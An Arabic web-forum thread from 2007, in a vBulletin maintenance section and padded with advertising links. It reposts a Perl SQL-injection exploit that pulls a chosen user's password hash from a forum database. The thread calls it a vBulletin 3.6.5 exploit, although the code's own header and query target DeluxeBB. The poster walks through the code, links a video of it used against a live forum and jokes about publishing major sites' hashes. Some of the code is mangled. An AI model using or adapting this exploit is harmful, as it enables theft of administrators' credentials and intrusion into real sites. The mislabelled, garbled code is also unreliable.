منتديات  

العودة   منتديات مدرسة المشاغبين > منتديات تطوير مواقع تطوير منتديات منتديات برمجه منتديات سكربتات PHP CGI ASP.NET SQL Scripts > تطوير و صيانة المنتديات vBulletin

تطوير و صيانة المنتديات vBulletin للمنتديات اعدادات في لوحة التحكم صلاحيات هاكات هاك مجموعات المدير تمبلت كيف حل اخطاء رمزية نسخة للمنتدى طريقة القوالب الستايل vBulletin® Version 3.8.1 Patch Level 2

ماشاء الله تبارك الله ماشاء الله لاقوة الا بالله - اللهم اني اسالك الهدى والتقى والعفاف والغنى

عيادة الدكتور بشار البزرة
جاهل بالغرام موقع ابسط مما تتخيل 14-1-1431

حراج سيارات 19-4-1431هـ  سماء نجد ينتهي في 10-1-1431هـ ورد الروح ينتهي في 1-4-1431هـ
افضل و اقوى و احلى و اجمل موقع افلام و فيديو يوتيوب youtube على الاطلاق ينتهي في 10-1-1431هـ بنات الرياض سعوديات نسائي بناتي حريمي
للاعلان الاتصال بجوال 0555055075   بدر   منتديات مهجة ينبع 18-1-1430 ه
للاعلان الاتصال بجوال 0555055075   بدر   عطور خاصة مخلطات نادرة عطور فرنسية لوشن للجسم 28-12-1430 للاعلان الاتصال بجوال 0555055075   بدر 

روابط مهمة و مفيدة : لاستعادة الباسورد الرقم السري || كيف يتم تفعيل الاشتراك || طلب كود تفعيل العضوية على البريد
استضافة مواقع معنى كلمة رسائل مسجات vshzg ls[hj دردشة شات ]v]am ahj افلام مقاطع فلم مقطع
مكتبة فلاش اسلامي الثقافة الجنسية صور في صورة شات صوتي الأسره المسلمه
ابتسامات خلفيات العاب جديدة دليل مواقع احداثيات gps القرآن الكريم
بطاقات كروت جوال موبايل جافا java قصص روايات sitemap
كتب الكترونية ماسنجر في مسنجر خطوط وصلات روابط العاب بنات للبنات فقط


vbulletin v3.6.5 Remote SQL Injection Exploit النجدة للمنتديات العربية

تطوير و صيانة المنتديات vBulletin


إضافة رد
 
أدوات الموضوع طريقة عرض الموضوع
  #1 (permalink)  
قديم 04-19-2007, 01:16 AM
صورة ياخذ ومايعطي
طالب ابتدائي
 
تاريخ التسجيل: Jan 2007
البلد - المكان و السكن :
السيرة :
هواية :
وظيفة - عمل:
جنس :
جنسية :
موقع :
جوال موبايل :
مشاركات : 78
العمر :
الاوسمة :
مهم vbulletin v3.6.5 Remote SQL Injection Exploit النجدة للمنتديات العربية

والله ياشباب يوم شفت التطبيق على الموقع الرئيسي
للمنتديات هني تذكرت المنتديات العربية
انا ماحب اقول انوا الثغره تم كشفها بالاول من قبل سيوف الاسلام وبعدين تم الكشف عنها وفضحها فريق تركي

المهم
اعطيكم المختصر
اقتباس:
المشاركة الأصلية كتبت بواسطة SnIpEr_SyRiA مشاهدة المشاركة
مرحبا
جايبلكم ثغرة اليوم نص المواقع مصاب بيهة
ثغرة تعطيك بسورد المشرف العام او المدير حسب رقم الاعضوية يلي انت تطلبو
لتحميل الدرس الدرس فيديو والحمد الله مني
ويرجا عند النقل نقل المصدر وكاتب الموضوع
كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع
تحياتي
sniper_syria
القناص سوري
كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع


------------------------------------------------
كااتب الرد shap7_haCker
[
كود PHP:
#!/usr/bin/perl

use IO::Socket;

print 
q{
######################################################
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
# // SekoMirza // Turkish Hackerz #
######################################################
};
تحياتى
|11

if (!
$ARGV[2]) {

print 
q
Usageperl dbbxpl.pl host /directoryvictim_userid 

perl dbbxpl
.pl www.somesite.com /forum1

};

}

$server $ARGV[0];
$dir $ARGV[1];
$user $ARGV[2];
$myuser $ARGV[3];
$mypass $ARGV[4];
$myid $ARGV[5];

print 
"-----------------------------------------------------------------------
-------------------------\r\n"
;
print 
"[>] SERVER: $server\r\n";
print 
"[>] DIR: $dir\r\n";
print 
"[>] USERID: $user\r\n";
print 
"-----------------------------------------------------------------------
-------------------------\r\n\r\n"
;

$server =~ s/(http://)//eg;

$path $dir;
$path .=

"misc.php?sub=profile&*_**_**_**_*=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%

20WHERE%20(uid='"
.$user ;

print 
"[~] PREPARE TO CONNECT...\r\n";

$socket IO::Socket::INET->newProto => "tcp"PeerAddr => "$server"PeerPort => "80") || die "[-] CONNECTION FAILED";

print 
"[+] CONNECTED\r\n";
print 
"[~] SENDING QUERY...\r\n";
print 
$socket "GET $path HTTP/1.1\r\n";
print 
$socket "Host: $server\r\n";
print 
$socket "Accept: */*\r\n";
print 
$socket "Connection: close\r\n\r\n";
print 
"[+] DONE!\r\n\r\n";

print 
"--[ REPORT ]-----------------------------------------------------------------------
-------------\r\n"
;
while (
$answer = <$socket>)
{

if (
$answer =~/(w{32})/)
{

if ($
1 ne 0) {
print 
"Password Hash is: ".$1."\r\n";
print 
"-----------------------------------------------------------------------
---------------\r\n"
;

}
exit();
}

}
print 
"-----------------------------------------------------------------------
-------------------------\r\n"
;

#########################################################
#Shoutz: #
# #
# My Sweet -> Caramel #
# For Mp3s -> Hypn0sis #
# For Support -> [WwW.StarHack.Org] #
# My Bro -> PhantomOrchid #
# My Preceptor -> Earnk Kazno #
######################################################### 
]

اذا عرف السبب بطل العجب والله مشكله جاري حل المشكله والترقيع معه انو الحمدلله ماخذ احتياط مسبق ؟؟





رابط الموضوع
كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع


من مواضيعي في الموقع على قسم 0 الهاك الجبار في الحمايه منع من استغلال القواعد يمنع التحويل تحكم في كل شي ء من الفريق الامني
0 جرب قوة هاك الحماية واطمئن على منتداك جرب وشوفه Islam swords team
0 you ولا هنت ياريت ترقي لي الاستايل لموقع اسلامي
0 مصيبة you انت مافي غيرك عليها تعال احذف اللي الاحصائيات لانك بكرا تحتاج تسويها بنفسك وشوف السبب
0 في بي ادفانسد الإصدار الأخير vBadvanced CMPS 2.2.1
0 vbulletin v3.6.5 Remote SQL Injection Exploit النجدة للمنتديات العربية

منتديات فراشة حواء - للبنات للنساء نسائي للفتيات
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احلا الاغاني اجمل الاناشيد اخر و افضل البومات

بنات الرياض سعوديات نسائي بناتي سعودي-اروع و اقوى موقع افلام و فيديو يوتيوب youtube على الاطلاق
دليل مواقع الفوركس والمتاجرة الالكترونية

رد مع اقتباس
  #2 (permalink)  
قديم 04-19-2007, 01:59 AM
صورة ياخذ ومايعطي
طالب ابتدائي
 
تاريخ التسجيل: Jan 2007
البلد - المكان و السكن :
السيرة :
هواية :
وظيفة - عمل:
جنس :
جنسية :
موقع :
جوال موبايل :
مشاركات : 78
العمر :
الاوسمة :
رد: vbulletin v3.6.5 Remote SQL Injection Exploit النجدة للمنتديات العربية

نعود الليكم لان جون يمكن اصاب بالجنون
اللمهم ماعلينا
ابو عمر ولا هنت ياقلبي اذا نزلت النسخه 3.6.6
هذي الهاكات اللي نبيها


2 ----> استبدال رابط الموضوع إلى عنوانه
3 ----> منع المشرف من إعطاء إنذار خارج قسمه
4 ----> آخر عشر رسائل خاصة في لوحة التحكم
5 ----> أستبدال أسم كاتب الموضوع بأسم عضو آخر
6 ---->المسمى الاضافي للعضو او الوصف للعضو
7 ----> البنرات العشوائية للمنتدى تحكم كامل وتقرير عن الضغطات والزيارات للبنر محدث
8 ----> تصغير الصور تلقائيا بمواصفات خياليه
9 ----> التحكم بخيارات التوقيع المتقدم مثل الأبعاد والأسطر والصور والحجم محدث


12----> منع إرسال روابط عن طريق الرسائل الخاصة
14----> تحويل الوقت إلى صباحا مساء والتاريخ الهجري
15----> الرسائل الخاصة الإدارية الأوتوماتيكية عند نقل حذف تثبيت أي موضوع
16----> منع استخدام الرسائل الخاصة إلا بعد عدد معين
د
18----> هاك أفضل المشاركين خلال الشهر
19----> شريط متحرك بالأعلى بلوحة تحكم بالسرعة واللون والحجم وغيره

21----> هاك كشف الرسائل الخاصة مميزات رائعة بتحكم
23----> المتواجدون اليوم بمميزات رهيبه

27----> هاك الدخول بأسماء الأعضاء للمدير بدون رقم سري
28----> جعل الموضوع قديما أو وضعه في الأعلى
29----> التأكد من وجود الموضوع عند كتابته
30----> عدم السماح للعضو بتقييم موضوعه
31----> ألوان رتب المجموعات
32----> تحديد الايبي الحقيقي
33----> إعلانات في الصفحة الرئيسية بتحكم مميز
34----> فصل المواضيع العادية عن المثبتة المطور
35----> ضغط وتسريع تصفح المنتدى
36----> منتج تعطيل التوقيع في الأقسام مثل الإسلامي وغيره
37----> منع الحذف الفعلي للمشرفين
38----> إحصائيات حركة المشرفين

42----> أيقونه أو صوره لكل قسم >>>> يحتاج تعديل قوالب
43----> الشريط المرن بتحكم كامل >>>> يحتاج تعديل قوالب
44----> عرض بيانات عن الـ Ip بالتفصيل >>>> يحتاج تعديل قوالب
45----> الصندوق الماسي >>>> يحتاج تعديل قوالب
46----> الاوسمه الإصدار الجديد المميز >>>> يحتاج تعديل قوالب

48----> من مواضيع الكاتب في البوست بت >>>> يحتاج تعديل قوالب
49----> بنر لكل مجلس بشكل مستقل عن بقية المجالس >>>> يحتاج تعديل قوالب

50----> إحصائية المنتدى المنسقة (( مثل مجموع المسجلين والمتصلين والمواضيع والمشاركات )) >>>> يحتاج تعديل قوالب
52----> انشط عضو هذا اليوم >>>> يحتاج تعديل قوالب
57----> عرض استفتاء معين فى الرئيسية جديد
59----> حذف الرسائل الخاصة أقدم من X يوم جديد
62----> بداية افتتاح المنتدى >>>> يحتاج تعديل قوالب جديد

64----> حذف البريد من المواضيع ومن الرسائل الخاصة للنسخة جديد
65
66----> مراسل الأعضاء الغير متفاعلين جديد
67----> منتج لوحة الشرف ( المتميزين ) >>>> يحتاج تعديل قوالب جديد اختر مابين الهاك والهاك رقم 50 صندوق التميزد
69----> حل مشكلة عدم ظهور اسم المرفق باللغة العربية جديد
70----> الانتقال التلقائي للرسائل البريدية جدي

والله ابو عمر هذول اكفايه لان الباقي يسبب ارهاق للمنتدي وصاحب المنتدي ومشكور على النسخ الاكثر من رائعه
اللي تنزل من ايادي بارك الله فيها


من مواضيعي في الموقع على قسم 0 الهاك الجبار في الحمايه منع من استغلال القواعد يمنع التحويل تحكم في كل شي ء من الفريق الامني
0 جرب قوة هاك الحماية واطمئن على منتداك جرب وشوفه Islam swords team
0 you ولا هنت ياريت ترقي لي الاستايل لموقع اسلامي
0 مصيبة you انت مافي غيرك عليها تعال احذف اللي الاحصائيات لانك بكرا تحتاج تسويها بنفسك وشوف السبب
0 في بي ادفانسد الإصدار الأخير vBadvanced CMPS 2.2.1
0 vbulletin v3.6.5 Remote SQL Injection Exploit النجدة للمنتديات العربية

منتديات فراشة حواء - للبنات للنساء نسائي للفتيات
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احلا الاغاني اجمل الاناشيد اخر و افضل البومات

بنات الرياض سعوديات نسائي بناتي سعودي-اروع و اقوى موقع افلام و فيديو يوتيوب youtube على الاطلاق
دليل مواقع الفوركس والمتاجرة الالكترونية

رد مع اقتباس
  #3 (permalink)  
قديم 04-19-2007, 02:40 AM
صورة HaRD-2-GeT
ادارة الاقسام التطويريه
 
تاريخ التسجيل: Jan 2006
البلد - المكان و السكن :
السيرة :
هواية :
وظيفة - عمل:
جنس :
جنسية :
موقع :
جوال موبايل :
مشاركات : 1,048
العمر :
الاوسمة :
رد: vbulletin v3.6.5 Remote SQL Injection Exploit النجدة للمنتديات العربية

يعطيك العافية ,, على المعلومة

وهذا رابط الموضوع في الشركة

كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع

الموضوع اللي موجود في الشركة ,, يقول ,, ان هذي مو ثغرة ,, لان السكربت يبحث عن الهاش اللي موجود في الصفحة

ويقول أيضا انه يراسل الموقع يشيلونها من الثغرات



,,,

على فكرة ,, md5 الهاش ,, اذا كان مكون من رموز ,, وحروف واكثر من 15 حرف ,,

فما أعتقد , إن في خطورة , لانه مستحيل فك تشفيره

حتى لو كان السالت موجود ,,, ولا أنا غلطان


من مواضيعي في الموقع على قسم 0 هذا هو ما أريد ((( الحب الذي أريد ))
0 قـوانـيـن منتدى الاستايلات ( للقراءة والالتزام)
0 قـوانـيـن قسم الهاكـــات تم التحرير في الأربعاء 30 رجب 1430
0 لــم يــتم الـرد على موضـوعك ؟؟!! ادخل هنــــــا :)
0 (شرح) كيف تضيف علامة صح أمام < تذكرني ؟ > عند تسجيل الدخول
0 أوراق مقطوفة ,, واحساس مرئي ..

منتديات فراشة حواء - للبنات للنساء نسائي للفتيات
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احلا الاغاني اجمل الاناشيد اخر و افضل البومات

بنات الرياض سعوديات نسائي بناتي سعودي-اروع و اقوى موقع افلام و فيديو يوتيوب youtube على الاطلاق
دليل مواقع الفوركس والمتاجرة الالكترونية

رد مع اقتباس
  #4 (permalink)  
قديم 04-19-2007, 03:36 AM
صورة ياخذ ومايعطي
طالب ابتدائي
 
تاريخ التسجيل: Jan 2007
البلد - المكان و السكن :
السيرة :
هواية :
وظيفة - عمل:
جنس :
جنسية :
موقع :
جوال موبايل :
مشاركات : 78
العمر :
الاوسمة :
رد: vbulletin v3.6.5 Remote SQL Injection Exploit النجدة للمنتديات العربية

هو معاك حق في الكلام
وهم جون معاه حق بس المشكله خليتها تتعدا جون وتدعى الادعاءات كلها طيب هاللحين

اللمهم طريقة العمل شوي وشروحات معاها
يقوم بلتصال بملف
"tcp",
على بورت
80
اذا استجاب ملف tcp
لا يضهر لك هذيه الرسالة
"[-] CONNECTION FAILED
اذا تم بستجابة
تضهر لك البسورد
print "[+] CONNECTED\r\n";
الاتصال
print "[~] SENDING QUERY...\r\n";
تجربة سريعة
print $socket "GET $path HTTP/1.1\r\n";
سحب عن طريق الـpath$
print $socket "Host: $server\r\n";
رابط الموقع
print $socket "Accept: */*\r\n";
تم الموافق االدخول
print $socket "Connection: close\r\n\r\n";
لم يتم موافقة
print "[+] DONE!\r\n\r\n";
المشكله تكمن انها نفس الحظ ماعرف ماهي البيئه الحاويه اللها

نتابع عشان يروح ينكر الثغره عدل في السكيورتي
حطيت رابط فيديوا مطبق على منتداه خخخخخخخخخخخخخ
بس الصراحه تحصل على الهاش
وبعد ماتشوف الفيديو راح تحكم من كلامه صح shap7_haCker معه SnIpEr_SyRiA
او كلام جون اللمهم
هذا رابط الفيديوا مباشر يدعم كل شي
كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع

يالله شوفوا ورد اللي خبر ولاتواخذوني على مكان رفع الملف بس تعرف موقع وطاير من امله نستفيد منه شوي


من مواضيعي في الموقع على قسم 0 الهاك الجبار في الحمايه منع من استغلال القواعد يمنع التحويل تحكم في كل شي ء من الفريق الامني
0 جرب قوة هاك الحماية واطمئن على منتداك جرب وشوفه Islam swords team
0 you ولا هنت ياريت ترقي لي الاستايل لموقع اسلامي
0 مصيبة you انت مافي غيرك عليها تعال احذف اللي الاحصائيات لانك بكرا تحتاج تسويها بنفسك وشوف السبب
0 في بي ادفانسد الإصدار الأخير vBadvanced CMPS 2.2.1
0 vbulletin v3.6.5 Remote SQL Injection Exploit النجدة للمنتديات العربية

منتديات فراشة حواء - للبنات للنساء نسائي للفتيات
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احلا الاغاني اجمل الاناشيد اخر و افضل البومات

بنات الرياض سعوديات نسائي بناتي سعودي-اروع و اقوى موقع افلام و فيديو يوتيوب youtube على الاطلاق
دليل مواقع الفوركس والمتاجرة الالكترونية

رد مع اقتباس
  #5 (permalink)  
قديم 04-20-2007, 04:44 AM
صورة ياخذ ومايعطي
طالب ابتدائي
 
تاريخ التسجيل: Jan 2007
البلد - المكان و السكن :
السيرة :
هواية :
وظيفة - عمل:
جنس :
جنسية :
موقع :
جوال موبايل :
مشاركات : 78
العمر :
الاوسمة :
رد: vbulletin v3.6.5 Remote SQL Injection Exploit النجدة للمنتديات العربية

ايه والله مشكله مشاهدات على الفاضي محدا شاف الحل طيب راح اخلي الموضوع هذا احط هاشات اكبر المواقع اريح هههههههههههههههههههههههههههههههه


من مواضيعي في الموقع على قسم 0 الهاك الجبار في الحمايه منع من استغلال القواعد يمنع التحويل تحكم في كل شي ء من الفريق الامني
0 جرب قوة هاك الحماية واطمئن على منتداك جرب وشوفه Islam swords team
0 you ولا هنت ياريت ترقي لي الاستايل لموقع اسلامي
0 مصيبة you انت مافي غيرك عليها تعال احذف اللي الاحصائيات لانك بكرا تحتاج تسويها بنفسك وشوف السبب
0 في بي ادفانسد الإصدار الأخير vBadvanced CMPS 2.2.1
0 vbulletin v3.6.5 Remote SQL Injection Exploit النجدة للمنتديات العربية

منتديات فراشة حواء - للبنات للنساء نسائي للفتيات
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احلا الاغاني اجمل الاناشيد اخر و افضل البومات

بنات الرياض سعوديات نسائي بناتي سعودي-اروع و اقوى موقع افلام و فيديو يوتيوب youtube على الاطلاق
دليل مواقع الفوركس والمتاجرة الالكترونية

رد مع اقتباس
إضافة رد

أدوات الموضوع
طريقة عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة



الساعة الآن توقيت السعودية الرياض جدة الشرقية القصيم 09:35 AM.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd diamond
للإعلان بالموقع    |    اتصـل بنــا - About

جامعة الامام 28-1-1431 الجامعة الاسلامية 28-1-1431 جامعة نجران 2-6-1431 جامعة الملك فهد 22-1-1431

SEO by vBSEO 3.2.0